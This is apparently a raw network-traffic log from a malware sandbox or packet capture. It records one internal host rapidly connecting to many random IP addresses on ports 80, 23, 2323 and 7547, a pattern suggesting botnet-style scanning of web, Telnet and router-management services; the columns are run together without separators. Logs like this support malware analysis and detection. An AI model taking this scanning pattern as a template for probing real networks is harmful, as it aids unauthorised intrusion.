                                          Nov 7, 2024 11:58:00.440439939 CET3044880192.168.2.1384.142.87.107
                                          Nov 7, 2024 11:58:00.440453053 CET3044880192.168.2.1384.169.180.224
                                          Nov 7, 2024 11:58:00.440459013 CET3044880192.168.2.1384.74.75.172
                                          Nov 7, 2024 11:58:00.440469980 CET3044880192.168.2.1384.222.161.150
                                          Nov 7, 2024 11:58:00.440490961 CET3044880192.168.2.1384.37.116.64
                                          Nov 7, 2024 11:58:00.440490961 CET3044880192.168.2.1384.188.251.174
                                          Nov 7, 2024 11:58:00.440491915 CET3044880192.168.2.1384.245.147.48
                                          Nov 7, 2024 11:58:00.440491915 CET3044880192.168.2.1384.124.6.52
                                          Nov 7, 2024 11:58:00.440500021 CET3044880192.168.2.1384.209.223.94
                                          Nov 7, 2024 11:58:00.440500975 CET3044880192.168.2.1384.157.71.64
                                          Nov 7, 2024 11:58:00.440509081 CET3044880192.168.2.1384.121.97.119
                                          Nov 7, 2024 11:58:00.440509081 CET3044880192.168.2.1384.30.203.65
                                          Nov 7, 2024 11:58:00.440510035 CET3044880192.168.2.1384.209.111.113
                                          Nov 7, 2024 11:58:00.440514088 CET3044880192.168.2.1384.237.51.144
                                          Nov 7, 2024 11:58:00.440534115 CET3044880192.168.2.1384.211.163.25
                                          Nov 7, 2024 11:58:00.440548897 CET3044880192.168.2.1384.16.16.130
                                          Nov 7, 2024 11:58:00.440548897 CET3044880192.168.2.1384.215.79.35
                                          Nov 7, 2024 11:58:00.440548897 CET3044880192.168.2.1384.126.183.28
                                          Nov 7, 2024 11:58:00.440553904 CET3044880192.168.2.1384.73.45.247
                                          Nov 7, 2024 11:58:00.440557003 CET3044880192.168.2.1384.223.40.246
                                          Nov 7, 2024 11:58:00.440563917 CET3044880192.168.2.1384.39.126.0
                                          Nov 7, 2024 11:58:00.440570116 CET3044880192.168.2.1384.237.38.161
                                          Nov 7, 2024 11:58:00.440570116 CET3044880192.168.2.1384.117.252.6
                                          Nov 7, 2024 11:58:00.440573931 CET3044880192.168.2.1384.37.181.134
                                          Nov 7, 2024 11:58:00.440581083 CET3044880192.168.2.1384.27.198.197
                                          Nov 7, 2024 11:58:00.440591097 CET3044880192.168.2.1384.127.66.139
                                          Nov 7, 2024 11:58:00.440591097 CET3044880192.168.2.1384.114.239.99
                                          Nov 7, 2024 11:58:00.440593004 CET3044880192.168.2.1384.225.66.237
                                          Nov 7, 2024 11:58:00.440614939 CET3044880192.168.2.1384.215.25.204
                                          Nov 7, 2024 11:58:00.440615892 CET3044880192.168.2.1384.243.229.108
                                          Nov 7, 2024 11:58:00.440623999 CET3044880192.168.2.1384.107.219.23
                                          Nov 7, 2024 11:58:00.440624952 CET3044880192.168.2.1384.167.109.3
                                          Nov 7, 2024 11:58:00.440642118 CET3044880192.168.2.1384.187.45.218
                                          Nov 7, 2024 11:58:00.440643072 CET3044880192.168.2.1384.64.71.189
                                          Nov 7, 2024 11:58:00.440643072 CET3044880192.168.2.1384.103.104.73
                                          Nov 7, 2024 11:58:00.440649033 CET3044880192.168.2.1384.18.8.254
                                          Nov 7, 2024 11:58:00.440659046 CET3044880192.168.2.1384.107.163.116
                                          Nov 7, 2024 11:58:00.440665007 CET3044880192.168.2.1384.3.131.56
                                          Nov 7, 2024 11:58:00.440665007 CET3044880192.168.2.1384.4.242.62
                                          Nov 7, 2024 11:58:00.440665007 CET3044880192.168.2.1384.183.233.130
                                          Nov 7, 2024 11:58:00.440861940 CET3044880192.168.2.1384.126.167.247
                                          Nov 7, 2024 11:58:00.440866947 CET3044880192.168.2.1384.114.99.138
                                          Nov 7, 2024 11:58:00.440872908 CET3044880192.168.2.1384.250.167.110
                                          Nov 7, 2024 11:58:00.441338062 CET382627547192.168.2.1320.208.34.62
                                          Nov 7, 2024 11:58:00.441338062 CET4531023192.168.2.13171.119.113.145
                                          Nov 7, 2024 11:58:00.441340923 CET5450423192.168.2.1340.117.107.0
                                          Nov 7, 2024 11:58:00.441340923 CET3639623192.168.2.13160.219.200.63
                                          Nov 7, 2024 11:58:00.441346884 CET499627547192.168.2.13156.78.209.36
                                          Nov 7, 2024 11:58:00.441346884 CET385422323192.168.2.13160.165.32.120
                                          Nov 7, 2024 11:58:00.441348076 CET4103480192.168.2.1337.195.202.171
                                          Nov 7, 2024 11:58:00.441346884 CET511867547192.168.2.1378.190.240.127
                                          Nov 7, 2024 11:58:00.441349983 CET4610423192.168.2.13128.243.188.47
                                          Nov 7, 2024 11:58:00.441358089 CET3779423192.168.2.1345.41.30.48
                                          Nov 7, 2024 11:58:00.441364050 CET3821823192.168.2.13154.137.241.168
                                          Nov 7, 2024 11:58:00.441364050 CET5752623192.168.2.1342.129.48.109
                                          Nov 7, 2024 11:58:00.441364050 CET373487547192.168.2.135.8.101.228
                                          Nov 7, 2024 11:58:00.441365957 CET520347547192.168.2.13145.65.108.245
                                          Nov 7, 2024 11:58:00.441366911 CET426687547192.168.2.13207.86.105.37
                                          Nov 7, 2024 11:58:00.441370964 CET4441623192.168.2.13122.118.33.185
                                          Nov 7, 2024 11:58:00.441373110 CET5080823192.168.2.13159.179.23.249
                                          Nov 7, 2024 11:58:00.441371918 CET367867547192.168.2.13102.191.171.160
                                          Nov 7, 2024 11:58:00.441373110 CET5222023192.168.2.13157.72.124.26
                                          Nov 7, 2024 11:58:00.441378117 CET4000423192.168.2.13222.249.219.187
                                          Nov 7, 2024 11:58:00.441384077 CET460187547192.168.2.13144.24.215.144
                                          Nov 7, 2024 11:58:00.441384077 CET389487547192.168.2.1358.52.165.16
                                          Nov 7, 2024 11:58:00.441387892 CET537787547192.168.2.13218.4.9.0
                                          Nov 7, 2024 11:58:00.441387892 CET361927547192.168.2.1395.245.103.118
                                          Nov 7, 2024 11:58:00.441389084 CET605467547192.168.2.13161.120.27.203
                                          Nov 7, 2024 11:58:00.441389084 CET527107547192.168.2.13164.23.110.18
                                          Nov 7, 2024 11:58:00.441880941 CET803044884.79.47.203192.168.2.13
                                          Nov 7, 2024 11:58:00.441894054 CET803044884.217.224.144192.168.2.13
                                          Nov 7, 2024 11:58:00.441934109 CET3044880192.168.2.1384.79.47.203
                                          Nov 7, 2024 11:58:00.441934109 CET3044880192.168.2.1384.217.224.144
                                          Nov 7, 2024 11:58:00.451244116 CET228880192.168.2.13200.66.250.101
                                          Nov 7, 2024 11:58:00.451252937 CET228880192.168.2.13200.70.55.157
                                          Nov 7, 2024 11:58:00.451256037 CET228880192.168.2.13200.217.223.142
                                          Nov 7, 2024 11:58:00.451256037 CET228880192.168.2.13200.96.251.170
                                          Nov 7, 2024 11:58:00.451258898 CET228880192.168.2.13200.125.11.224
                                          Nov 7, 2024 11:58:00.451272964 CET228880192.168.2.13200.174.140.115
                                          Nov 7, 2024 11:58:00.451272964 CET228880192.168.2.13200.179.15.176
                                          Nov 7, 2024 11:58:00.451283932 CET228880192.168.2.13200.147.116.244
                                          Nov 7, 2024 11:58:00.451283932 CET228880192.168.2.13200.5.173.155
                                          Nov 7, 2024 11:58:00.451283932 CET228880192.168.2.13200.214.55.11
                                          Nov 7, 2024 11:58:00.451297045 CET228880192.168.2.13200.176.118.231
                                          Nov 7, 2024 11:58:00.451301098 CET228880192.168.2.13200.238.52.85
                                          Nov 7, 2024 11:58:00.451317072 CET228880192.168.2.13200.249.128.89
                                          Nov 7, 2024 11:58:00.451327085 CET228880192.168.2.13200.190.125.37
                                          Nov 7, 2024 11:58:00.451327085 CET228880192.168.2.13200.224.153.161
                                          Nov 7, 2024 11:58:00.451328993 CET228880192.168.2.13200.25.245.8
                                          Nov 7, 2024 11:58:00.451328993 CET228880192.168.2.13200.219.139.199
                                          Nov 7, 2024 11:58:00.451330900 CET228880192.168.2.13200.248.120.95
                                          Nov 7, 2024 11:58:00.451329947 CET228880192.168.2.13200.4.77.19
                                          Nov 7, 2024 11:58:00.451332092 CET228880192.168.2.13200.163.134.25
                                          Nov 7, 2024 11:58:00.451334000 CET228880192.168.2.13200.11.162.138
                                          Nov 7, 2024 11:58:00.451334000 CET228880192.168.2.13200.91.146.192
                                          Nov 7, 2024 11:58:00.451335907 CET228880192.168.2.13200.35.118.6
                                          Nov 7, 2024 11:58:00.451345921 CET228880192.168.2.13200.9.5.4
                                          Nov 7, 2024 11:58:00.451347113 CET228880192.168.2.13200.71.69.35
                                          Nov 7, 2024 11:58:00.451347113 CET228880192.168.2.13200.235.89.196
                                          Nov 7, 2024 11:58:00.451348066 CET228880192.168.2.13200.194.36.166
                                          Nov 7, 2024 11:58:00.451354980 CET228880192.168.2.13200.135.12.163
                                          Nov 7, 2024 11:58:00.451359987 CET228880192.168.2.13200.139.103.60
                                          Nov 7, 2024 11:58:00.451365948 CET228880192.168.2.13200.161.4.123
                                          Nov 7, 2024 11:58:00.451365948 CET228880192.168.2.13200.3.110.81
                                          Nov 7, 2024 11:58:00.451371908 CET228880192.168.2.13200.94.150.108
                                          Nov 7, 2024 11:58:00.451375008 CET228880192.168.2.13200.211.160.207
                                          Nov 7, 2024 11:58:00.451375008 CET228880192.168.2.13200.71.64.196
                                          Nov 7, 2024 11:58:00.451380014 CET228880192.168.2.13200.211.8.208
                                          Nov 7, 2024 11:58:00.451383114 CET228880192.168.2.13200.147.104.51
                                          Nov 7, 2024 11:58:00.451386929 CET228880192.168.2.13200.170.0.142
                                          Nov 7, 2024 11:58:00.451386929 CET228880192.168.2.13200.154.93.165
                                          Nov 7, 2024 11:58:00.451391935 CET228880192.168.2.13200.238.109.221
                                          Nov 7, 2024 11:58:00.451406002 CET228880192.168.2.13200.187.167.222
                                          Nov 7, 2024 11:58:00.451406002 CET228880192.168.2.13200.48.125.247
                                          Nov 7, 2024 11:58:00.451406956 CET228880192.168.2.13200.197.10.77
                                          Nov 7, 2024 11:58:00.451406956 CET228880192.168.2.13200.70.165.7
                                          Nov 7, 2024 11:58:00.451423883 CET228880192.168.2.13200.165.162.7
                                          Nov 7, 2024 11:58:00.451423883 CET228880192.168.2.13200.79.83.251
                                          Nov 7, 2024 11:58:00.451423883 CET228880192.168.2.13200.19.11.197
                                          Nov 7, 2024 11:58:00.451423883 CET228880192.168.2.13200.53.42.184
                                          Nov 7, 2024 11:58:00.451426983 CET228880192.168.2.13200.40.116.213
                                          Nov 7, 2024 11:58:00.451426983 CET228880192.168.2.13200.238.207.90
                                          Nov 7, 2024 11:58:00.451431036 CET228880192.168.2.13200.208.112.102
                                          Nov 7, 2024 11:58:00.451440096 CET228880192.168.2.13200.181.246.90
                                          Nov 7, 2024 11:58:00.451440096 CET228880192.168.2.13200.122.36.39
                                          Nov 7, 2024 11:58:00.451440096 CET228880192.168.2.13200.17.96.8
                                          Nov 7, 2024 11:58:00.451442957 CET228880192.168.2.13200.110.145.189
                                          Nov 7, 2024 11:58:00.451447964 CET228880192.168.2.13200.8.249.134
                                          Nov 7, 2024 11:58:00.451447964 CET228880192.168.2.13200.114.3.68
                                          Nov 7, 2024 11:58:00.451452971 CET228880192.168.2.13200.142.113.189
                                          Nov 7, 2024 11:58:00.451457977 CET228880192.168.2.13200.16.2.248
                                          Nov 7, 2024 11:58:00.451468945 CET228880192.168.2.13200.246.142.78
                                          Nov 7, 2024 11:58:00.451469898 CET228880192.168.2.13200.53.52.163
                                          Nov 7, 2024 11:58:00.451492071 CET228880192.168.2.13200.193.192.57
                                          Nov 7, 2024 11:58:00.451492071 CET228880192.168.2.13200.193.153.116
                                          Nov 7, 2024 11:58:00.451493025 CET228880192.168.2.13200.4.87.22
                                          Nov 7, 2024 11:58:00.451492071 CET228880192.168.2.13200.254.52.242
                                          Nov 7, 2024 11:58:00.451492071 CET228880192.168.2.13200.226.90.169
                                          Nov 7, 2024 11:58:00.451492071 CET228880192.168.2.13200.172.27.19
                                          Nov 7, 2024 11:58:00.451492071 CET228880192.168.2.13200.114.177.244
                                          Nov 7, 2024 11:58:00.451498032 CET228880192.168.2.13200.178.10.86
                                          Nov 7, 2024 11:58:00.451502085 CET228880192.168.2.13200.4.35.117
                                          Nov 7, 2024 11:58:00.451508999 CET228880192.168.2.13200.97.11.53
                                          Nov 7, 2024 11:58:00.451508999 CET228880192.168.2.13200.250.158.57
                                          Nov 7, 2024 11:58:00.451508999 CET228880192.168.2.13200.19.163.214
                                          Nov 7, 2024 11:58:00.451519012 CET228880192.168.2.13200.116.19.0
                                          Nov 7, 2024 11:58:00.451522112 CET228880192.168.2.13200.64.73.227
                                          Nov 7, 2024 11:58:00.451522112 CET228880192.168.2.13200.5.202.232
                                          Nov 7, 2024 11:58:00.451523066 CET228880192.168.2.13200.99.112.90
                                          Nov 7, 2024 11:58:00.451535940 CET228880192.168.2.13200.110.171.230
                                          Nov 7, 2024 11:58:00.451539993 CET228880192.168.2.13200.46.128.42
                                          Nov 7, 2024 11:58:00.451545000 CET228880192.168.2.13200.128.243.215
                                          Nov 7, 2024 11:58:00.451545000 CET228880192.168.2.13200.79.62.188
                                          Nov 7, 2024 11:58:00.451545000 CET228880192.168.2.13200.2.150.117
                                          Nov 7, 2024 11:58:00.451551914 CET228880192.168.2.13200.72.193.220
                                          Nov 7, 2024 11:58:00.451553106 CET228880192.168.2.13200.219.111.176
                                          Nov 7, 2024 11:58:00.451560974 CET228880192.168.2.13200.100.247.166
                                          Nov 7, 2024 11:58:00.451560974 CET228880192.168.2.13200.41.128.223
                                          Nov 7, 2024 11:58:00.451560974 CET228880192.168.2.13200.0.64.23
                                          Nov 7, 2024 11:58:00.451564074 CET228880192.168.2.13200.163.223.162
                                          Nov 7, 2024 11:58:00.451564074 CET228880192.168.2.13200.40.221.19
                                          Nov 7, 2024 11:58:00.451564074 CET228880192.168.2.13200.245.173.182
                                          Nov 7, 2024 11:58:00.451564074 CET228880192.168.2.13200.66.23.35
                                          Nov 7, 2024 11:58:00.451565981 CET228880192.168.2.13200.254.146.237
                                          Nov 7, 2024 11:58:00.451565981 CET228880192.168.2.13200.90.215.190
                                          Nov 7, 2024 11:58:00.451581955 CET228880192.168.2.13200.162.80.98
                                          Nov 7, 2024 11:58:00.451586962 CET228880192.168.2.13200.71.181.218
                                          Nov 7, 2024 11:58:00.451587915 CET228880192.168.2.13200.123.8.155
                                          Nov 7, 2024 11:58:00.451587915 CET228880192.168.2.13200.133.1.95
                                          Nov 7, 2024 11:58:00.451590061 CET228880192.168.2.13200.247.67.156
                                          Nov 7, 2024 11:58:00.451594114 CET228880192.168.2.13200.236.77.34
                                          Nov 7, 2024 11:58:00.451601982 CET228880192.168.2.13200.201.122.93
                                          Nov 7, 2024 11:58:00.451608896 CET228880192.168.2.13200.29.132.54
                                          Nov 7, 2024 11:58:00.451611042 CET228880192.168.2.13200.180.148.120
                                          Nov 7, 2024 11:58:00.451611042 CET228880192.168.2.13200.247.195.201
                                          Nov 7, 2024 11:58:00.451613903 CET228880192.168.2.13200.101.209.174
                                          Nov 7, 2024 11:58:00.451613903 CET228880192.168.2.13200.247.248.127
                                          Nov 7, 2024 11:58:00.451622963 CET228880192.168.2.13200.166.236.51
                                          Nov 7, 2024 11:58:00.451622963 CET228880192.168.2.13200.174.66.80
                                          Nov 7, 2024 11:58:00.451625109 CET228880192.168.2.13200.49.237.69
                                          Nov 7, 2024 11:58:00.451628923 CET228880192.168.2.13200.138.243.187
                                          Nov 7, 2024 11:58:00.451628923 CET228880192.168.2.13200.61.248.180
                                          Nov 7, 2024 11:58:00.451638937 CET228880192.168.2.13200.117.234.131
                                          Nov 7, 2024 11:58:00.451639891 CET228880192.168.2.13200.244.34.240
                                          Nov 7, 2024 11:58:00.451642036 CET228880192.168.2.13200.174.63.234
                                          Nov 7, 2024 11:58:00.451642036 CET228880192.168.2.13200.183.46.52
                                          Nov 7, 2024 11:58:00.451646090 CET228880192.168.2.13200.112.191.209
                                          Nov 7, 2024 11:58:00.451652050 CET228880192.168.2.13200.90.70.229
                                          Nov 7, 2024 11:58:00.451652050 CET228880192.168.2.13200.48.222.252
                                          Nov 7, 2024 11:58:00.451658010 CET228880192.168.2.13200.11.228.3
                                          Nov 7, 2024 11:58:00.451658010 CET228880192.168.2.13200.186.1.37
                                          Nov 7, 2024 11:58:00.451667070 CET228880192.168.2.13200.95.242.239
                                          Nov 7, 2024 11:58:00.451667070 CET228880192.168.2.13200.143.219.176
                                          Nov 7, 2024 11:58:00.451670885 CET228880192.168.2.13200.229.174.101
                                          Nov 7, 2024 11:58:00.451677084 CET228880192.168.2.13200.158.202.150
                                          Nov 7, 2024 11:58:00.451678038 CET228880192.168.2.13200.178.171.23
                                          Nov 7, 2024 11:58:00.451683998 CET228880192.168.2.13200.248.137.46
                                          Nov 7, 2024 11:58:00.451683998 CET228880192.168.2.13200.114.122.2
                                          Nov 7, 2024 11:58:00.451692104 CET228880192.168.2.13200.182.70.161
                                          Nov 7, 2024 11:58:00.451693058 CET228880192.168.2.13200.174.81.103
                                          Nov 7, 2024 11:58:00.451693058 CET228880192.168.2.13200.161.126.168
                                          Nov 7, 2024 11:58:00.451699018 CET228880192.168.2.13200.204.3.63
                                          Nov 7, 2024 11:58:00.451699018 CET228880192.168.2.13200.186.1.33
                                          Nov 7, 2024 11:58:00.451706886 CET228880192.168.2.13200.168.73.38
                                          Nov 7, 2024 11:58:00.451706886 CET228880192.168.2.13200.145.246.2
                                          Nov 7, 2024 11:58:00.451716900 CET228880192.168.2.13200.23.45.93
                                          Nov 7, 2024 11:58:00.451734066 CET228880192.168.2.13200.79.198.69
                                          Nov 7, 2024 11:58:00.451735973 CET228880192.168.2.13200.80.34.126
                                          Nov 7, 2024 11:58:00.451735973 CET228880192.168.2.13200.127.174.115
                                          Nov 7, 2024 11:58:00.451735973 CET228880192.168.2.13200.240.38.64
                                          Nov 7, 2024 11:58:00.451736927 CET228880192.168.2.13200.215.16.176
                                          Nov 7, 2024 11:58:00.451735973 CET228880192.168.2.13200.46.3.172
                                          Nov 7, 2024 11:58:00.451736927 CET228880192.168.2.13200.196.78.222
                                          Nov 7, 2024 11:58:00.451741934 CET228880192.168.2.13200.235.91.119
                                          Nov 7, 2024 11:58:00.451741934 CET228880192.168.2.13200.213.220.121
                                          Nov 7, 2024 11:58:00.451741934 CET228880192.168.2.13200.183.228.111
                                          Nov 7, 2024 11:58:00.451745033 CET228880192.168.2.13200.170.66.184
                                          Nov 7, 2024 11:58:00.451761007 CET228880192.168.2.13200.126.30.71
                                          Nov 7, 2024 11:58:00.451761007 CET228880192.168.2.13200.196.242.64
                                          Nov 7, 2024 11:58:00.451766968 CET228880192.168.2.13200.231.67.205
                                          Nov 7, 2024 11:58:00.451766968 CET228880192.168.2.13200.79.87.139
                                          Nov 7, 2024 11:58:00.451776981 CET228880192.168.2.13200.69.149.36
                                          Nov 7, 2024 11:58:00.451775074 CET228880192.168.2.13200.232.248.42
                                          Nov 7, 2024 11:58:00.451775074 CET228880192.168.2.13200.8.210.44
                                          Nov 7, 2024 11:58:00.451783895 CET228880192.168.2.13200.60.71.61
                                          Nov 7, 2024 11:58:00.451785088 CET228880192.168.2.13200.251.162.217
                                          Nov 7, 2024 11:58:00.451786995 CET228880192.168.2.13200.227.4.253
                                          Nov 7, 2024 11:58:00.451790094 CET228880192.168.2.13200.77.106.37
                                          Nov 7, 2024 11:58:00.451791048 CET228880192.168.2.13200.179.75.251
                                          Nov 7, 2024 11:58:00.451792002 CET228880192.168.2.13200.173.213.0
                                          Nov 7, 2024 11:58:00.451797009 CET228880192.168.2.13200.107.228.233
                                          Nov 7, 2024 11:58:00.451812983 CET228880192.168.2.13200.180.222.147
                                          Nov 7, 2024 11:58:00.451812983 CET228880192.168.2.13200.165.148.80
                                          Nov 7, 2024 11:58:00.451827049 CET228880192.168.2.13200.158.107.177
                                          Nov 7, 2024 11:58:00.451827049 CET228880192.168.2.13200.46.67.22
                                          Nov 7, 2024 11:58:00.451827049 CET228880192.168.2.13200.36.89.211
                                          Nov 7, 2024 11:58:00.451824903 CET228880192.168.2.13200.55.48.45
                                          Nov 7, 2024 11:58:00.451824903 CET228880192.168.2.13200.180.122.103
                                          Nov 7, 2024 11:58:00.451833010 CET228880192.168.2.13200.216.226.159
                                          Nov 7, 2024 11:58:00.451833010 CET228880192.168.2.13200.194.164.91
                                          Nov 7, 2024 11:58:00.451834917 CET228880192.168.2.13200.129.16.47
                                          Nov 7, 2024 11:58:00.451852083 CET228880192.168.2.13200.57.104.19
                                          Nov 7, 2024 11:58:00.451853991 CET228880192.168.2.13200.122.189.16
                                          Nov 7, 2024 11:58:00.451853991 CET228880192.168.2.13200.33.117.156
                                          Nov 7, 2024 11:58:00.451854944 CET228880192.168.2.13200.183.234.8
                                          Nov 7, 2024 11:58:00.451875925 CET228880192.168.2.13200.210.234.236
                                          Nov 7, 2024 11:58:00.451879025 CET228880192.168.2.13200.79.214.58
                                          Nov 7, 2024 11:58:00.451879025 CET228880192.168.2.13200.243.146.51
                                          Nov 7, 2024 11:58:00.451881886 CET228880192.168.2.13200.92.103.246
                                          Nov 7, 2024 11:58:00.451880932 CET228880192.168.2.13200.165.153.255
                                          Nov 7, 2024 11:58:00.451881886 CET228880192.168.2.13200.234.140.134
                                          Nov 7, 2024 11:58:00.451881886 CET228880192.168.2.13200.156.246.155
                                          Nov 7, 2024 11:58:00.451884985 CET228880192.168.2.13200.35.195.203
                                          Nov 7, 2024 11:58:00.451884985 CET228880192.168.2.13200.58.152.215
                                          Nov 7, 2024 11:58:00.451884985 CET228880192.168.2.13200.245.66.227
                                          Nov 7, 2024 11:58:00.451884985 CET228880192.168.2.13200.203.198.6
                                          Nov 7, 2024 11:58:00.451890945 CET228880192.168.2.13200.41.76.57
                                          Nov 7, 2024 11:58:00.451891899 CET228880192.168.2.13200.196.28.197
                                          Nov 7, 2024 11:58:00.451894999 CET228880192.168.2.13200.137.132.31
                                          Nov 7, 2024 11:58:00.451908112 CET228880192.168.2.13200.84.129.49
                                          Nov 7, 2024 11:58:00.451915979 CET228880192.168.2.13200.209.51.95
                                          Nov 7, 2024 11:58:00.451915979 CET228880192.168.2.13200.89.15.149
                                          Nov 7, 2024 11:58:00.451917887 CET228880192.168.2.13200.167.181.188
                                          Nov 7, 2024 11:58:00.451917887 CET228880192.168.2.13200.78.59.154
                                          Nov 7, 2024 11:58:00.451921940 CET228880192.168.2.13200.71.11.170
                                          Nov 7, 2024 11:58:00.451921940 CET228880192.168.2.13200.233.48.160
                                          Nov 7, 2024 11:58:00.451925039 CET228880192.168.2.13200.117.63.188
                                          Nov 7, 2024 11:58:00.451930046 CET228880192.168.2.13200.173.75.37
                                          Nov 7, 2024 11:58:00.451934099 CET228880192.168.2.13200.140.118.77
                                          Nov 7, 2024 11:58:00.451934099 CET228880192.168.2.13200.163.239.121
                                          Nov 7, 2024 11:58:00.451940060 CET228880192.168.2.13200.53.56.213
                                          Nov 7, 2024 11:58:00.451941013 CET228880192.168.2.13200.92.0.1
                                          Nov 7, 2024 11:58:00.451941967 CET228880192.168.2.13200.36.75.176
                                          Nov 7, 2024 11:58:00.451946020 CET228880192.168.2.13200.231.156.251
                                          Nov 7, 2024 11:58:00.451961040 CET228880192.168.2.13200.23.218.181
                                          Nov 7, 2024 11:58:00.451963902 CET228880192.168.2.13200.155.10.113
                                          Nov 7, 2024 11:58:00.451967001 CET228880192.168.2.13200.59.81.69
                                          Nov 7, 2024 11:58:00.451967001 CET228880192.168.2.13200.84.26.81
                                          Nov 7, 2024 11:58:00.451967001 CET228880192.168.2.13200.149.228.34
                                          Nov 7, 2024 11:58:00.451971054 CET228880192.168.2.13200.225.70.170
                                          Nov 7, 2024 11:58:00.451972961 CET228880192.168.2.13200.176.67.181
                                          Nov 7, 2024 11:58:00.451975107 CET228880192.168.2.13200.153.103.153
                                          Nov 7, 2024 11:58:00.451982021 CET228880192.168.2.13200.95.79.252
                                          Nov 7, 2024 11:58:00.451986074 CET228880192.168.2.13200.34.6.156
                                          Nov 7, 2024 11:58:00.451991081 CET228880192.168.2.13200.200.171.150
                                          Nov 7, 2024 11:58:00.451991081 CET228880192.168.2.13200.188.24.107
                                          Nov 7, 2024 11:58:00.451992989 CET228880192.168.2.13200.63.244.172
                                          Nov 7, 2024 11:58:00.452012062 CET228880192.168.2.13200.14.253.235
                                          Nov 7, 2024 11:58:00.452012062 CET228880192.168.2.13200.72.153.207
                                          Nov 7, 2024 11:58:00.452014923 CET228880192.168.2.13200.106.165.172
                                          Nov 7, 2024 11:58:00.452014923 CET228880192.168.2.13200.237.127.234
                                          Nov 7, 2024 11:58:00.452018976 CET228880192.168.2.13200.3.218.3
                                          Nov 7, 2024 11:58:00.452018976 CET228880192.168.2.13200.110.50.65
                                          Nov 7, 2024 11:58:00.452024937 CET228880192.168.2.13200.27.55.199
                                          Nov 7, 2024 11:58:00.452024937 CET228880192.168.2.13200.214.64.131
                                          Nov 7, 2024 11:58:00.452028036 CET228880192.168.2.13200.129.218.132
                                          Nov 7, 2024 11:58:00.452030897 CET228880192.168.2.13200.219.2.183
                                          Nov 7, 2024 11:58:00.452033997 CET228880192.168.2.13200.208.54.100
                                          Nov 7, 2024 11:58:00.452038050 CET228880192.168.2.13200.42.42.209
                                          Nov 7, 2024 11:58:00.452050924 CET228880192.168.2.13200.77.40.29
                                          Nov 7, 2024 11:58:00.452050924 CET228880192.168.2.13200.145.247.198
                                          Nov 7, 2024 11:58:00.452050924 CET228880192.168.2.13200.163.32.124
                                          Nov 7, 2024 11:58:00.452059031 CET228880192.168.2.13200.195.145.249
                                          Nov 7, 2024 11:58:00.452066898 CET228880192.168.2.13200.251.92.106
                                          Nov 7, 2024 11:58:00.452068090 CET228880192.168.2.13200.106.87.61
                                          Nov 7, 2024 11:58:00.452068090 CET228880192.168.2.13200.128.123.21
                                          Nov 7, 2024 11:58:00.452073097 CET228880192.168.2.13200.55.252.86
                                          Nov 7, 2024 11:58:00.452073097 CET228880192.168.2.13200.72.141.186
                                          Nov 7, 2024 11:58:00.452075958 CET228880192.168.2.13200.151.181.44
                                          Nov 7, 2024 11:58:00.452080011 CET228880192.168.2.13200.127.156.192
                                          Nov 7, 2024 11:58:00.452088118 CET228880192.168.2.13200.59.162.253
                                          Nov 7, 2024 11:58:00.452092886 CET228880192.168.2.13200.23.145.192
                                          Nov 7, 2024 11:58:00.452092886 CET228880192.168.2.13200.175.16.36
                                          Nov 7, 2024 11:58:00.452094078 CET228880192.168.2.13200.238.37.113
                                          Nov 7, 2024 11:58:00.452095032 CET228880192.168.2.13200.93.134.122
                                          Nov 7, 2024 11:58:00.452101946 CET228880192.168.2.13200.26.32.202
                                          Nov 7, 2024 11:58:00.452109098 CET228880192.168.2.13200.154.170.168
                                          Nov 7, 2024 11:58:00.452109098 CET228880192.168.2.13200.88.186.36
                                          Nov 7, 2024 11:58:00.452115059 CET228880192.168.2.13200.182.190.36
                                          Nov 7, 2024 11:58:00.452115059 CET228880192.168.2.13200.72.185.64
                                          Nov 7, 2024 11:58:00.452115059 CET228880192.168.2.13200.253.98.238
                                          Nov 7, 2024 11:58:00.452121019 CET228880192.168.2.13200.189.159.234
                                          Nov 7, 2024 11:58:00.452127934 CET228880192.168.2.13200.18.150.225
                                          Nov 7, 2024 11:58:00.452131033 CET228880192.168.2.13200.50.101.251
                                          Nov 7, 2024 11:58:00.452131033 CET228880192.168.2.13200.154.216.242
                                          Nov 7, 2024 11:58:00.452136993 CET228880192.168.2.13200.13.238.169
                                          Nov 7, 2024 11:58:00.452143908 CET228880192.168.2.13200.69.137.97
                                          Nov 7, 2024 11:58:00.452143908 CET228880192.168.2.13200.113.203.148
                                          Nov 7, 2024 11:58:00.452157021 CET228880192.168.2.13200.123.111.156
                                          Nov 7, 2024 11:58:00.452157021 CET228880192.168.2.13200.252.209.166
                                          Nov 7, 2024 11:58:00.452157021 CET228880192.168.2.13200.153.105.163
                                          Nov 7, 2024 11:58:00.452157974 CET228880192.168.2.13200.21.240.249
                                          Nov 7, 2024 11:58:00.452176094 CET228880192.168.2.13200.212.188.233
                                          Nov 7, 2024 11:58:00.452178955 CET228880192.168.2.13200.104.27.144
                                          Nov 7, 2024 11:58:00.452186108 CET228880192.168.2.13200.64.187.202
                                          Nov 7, 2024 11:58:00.452193022 CET228880192.168.2.13200.187.83.115
                                          Nov 7, 2024 11:58:00.452193022 CET228880192.168.2.13200.252.194.63
                                          Nov 7, 2024 11:58:00.452194929 CET228880192.168.2.13200.219.201.35
                                          Nov 7, 2024 11:58:00.452197075 CET228880192.168.2.13200.71.110.36
                                          Nov 7, 2024 11:58:00.452203035 CET228880192.168.2.13200.158.132.142
                                          Nov 7, 2024 11:58:00.452203989 CET228880192.168.2.13200.224.146.53
                                          Nov 7, 2024 11:58:00.452203035 CET228880192.168.2.13200.199.207.147
                                          Nov 7, 2024 11:58:00.452204943 CET228880192.168.2.13200.255.178.86
                                          Nov 7, 2024 11:58:00.452208042 CET228880192.168.2.13200.67.105.195
                                          Nov 7, 2024 11:58:00.452209949 CET228880192.168.2.13200.218.239.108
                                          Nov 7, 2024 11:58:00.452224016 CET228880192.168.2.13200.162.26.139
                                          Nov 7, 2024 11:58:00.452224970 CET228880192.168.2.13200.176.165.99
                                          Nov 7, 2024 11:58:00.452224970 CET228880192.168.2.13200.79.163.82
                                          Nov 7, 2024 11:58:00.452225924 CET228880192.168.2.13200.185.167.25
                                          Nov 7, 2024 11:58:00.452227116 CET228880192.168.2.13200.22.50.138
                                          Nov 7, 2024 11:58:00.452238083 CET228880192.168.2.13200.200.77.203
                                          Nov 7, 2024 11:58:00.452244997 CET228880192.168.2.13200.147.171.41
                                          Nov 7, 2024 11:58:00.452244997 CET228880192.168.2.13200.181.62.208
                                          Nov 7, 2024 11:58:00.452250004 CET228880192.168.2.13200.13.88.36
                                          Nov 7, 2024 11:58:00.452250957 CET228880192.168.2.13200.188.127.106
